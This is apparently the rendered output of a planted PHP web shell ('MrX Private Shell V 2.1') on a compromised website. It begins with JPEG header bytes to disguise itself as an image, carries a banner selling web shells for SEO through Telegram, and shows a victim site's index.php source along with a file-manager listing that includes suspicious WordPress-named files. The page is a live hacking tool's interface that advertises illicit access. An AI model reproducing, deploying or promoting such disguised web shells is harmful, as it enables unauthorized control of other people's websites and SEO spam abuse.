����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
// Start output buffering
ob_start();
include 'config.php';
try {
$subdomain = getSubdomain();
// Enhanced area loading with fallbacks
$area = getAreaWithHierarchicalUrl($subdomain);
if (!$area) {
$area = getAreaBySlugSimple($subdomain);
if ($area) {
$area['hierarchical_url'] = createHierarchicalUrl($area['slug'], $area['parents'] ?? []);
$area['direct_url'] = createurl($area['slug']);
}
}
// Validate area data
if (!$area || empty($area['name'])) {
show404();
exit;
}
$currenturl = $area['hierarchical_url'] ?? createurl($subdomain);
$contentfile = contentincludefile();
// Load XML data safely
if (!file_exists(XML_FILE)) {
throw new Exception("Area data file not found");
}
$xml = loadCityList(XML_FILE);
$areas = parseAreas($xml);
if ($area) {
$children = getChildrenBySlug($areas, $area['slug']);
$parent = getParentBySlug($areas, $area['slug']);
// Add to area data for templates
$area['children_data'] = $children;
$area['parent_data'] = $parent;
}
// Include content and template
if (file_exists($contentfile)) {
include $contentfile;
replacePlaceholdersInContent($area, $currenturl);
} else {
// Log missing content but continue
error_log("Content file missing: " . $contentfile);
}
include 'template.php';
} catch (Exception $e) {
ob_clean();
error_log("Index Error: " . $e->getMessage());
show404();
}
ob_end_flush();| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| .well-known | Folder | 0777 |
|
|
| cache | Folder | 0777 |
|
|
| content | Folder | 0777 |
|
|
| content1 | Folder | 0777 |
|
|
| image | Folder | 0777 |
|
|
| .ftpquota | File | 12 B | 0666 |
|
| .htaccess | File | 197 B | 0444 |
|
| 404.php | File | 1.31 KB | 0666 |
|
| admin.php | File | 35.14 KB | 0666 |
|
| android-chrome-192x192.png | File | 78.08 KB | 0666 |
|
| android-chrome-512x512.png | File | 378.8 KB | 0666 |
|
| apple-touch-icon.png | File | 69.97 KB | 0666 |
|
| arealist.xml | File | 13.18 KB | 0666 |
|
| auth.php | File | 884 B | 0666 |
|
| cache.php | File | 948 B | 0666 |
|
| config.php | File | 1.61 KB | 0666 |
|
| content_manager.php | File | 11.84 KB | 0666 |
|
| delhigal.zip | File | 6.82 MB | 0644 |
|
| error_log | File | 778 B | 0666 |
|
| favicon-16x16.png | File | 977 B | 0666 |
|
| favicon-32x32.png | File | 3.26 KB | 0666 |
|
| favicon.ico | File | 15.04 KB | 0666 |
|
| frontpage.php | File | 113.04 KB | 0666 |
|
| google2fabcdaeda4836e4.html | File | 53 B | 0666 |
|
| index.php | File | 1.62 KB | 0666 |
|
| index1.html | File | 0 B | 0666 |
|
| index1.php | File | 1.63 KB | 0666 |
|
| login.php | File | 2.28 KB | 0666 |
|
| logout.php | File | 73 B | 0666 |
|
| robots.txt | File | 25 B | 0666 |
|
| site.webmanifest | File | 272 B | 0666 |
|
| sitemap.xml | File | 501 B | 0666 |
|
| style.css | File | 27.09 KB | 0666 |
|
| template.php | File | 93.07 KB | 0666 |
|
| wp-blog-header.php | File | 2.74 KB | 0644 |
|
| wp-cron.php | File | 2.74 KB | 0644 |
|
| xml_manager.php | File | 4.17 KB | 0666 |
|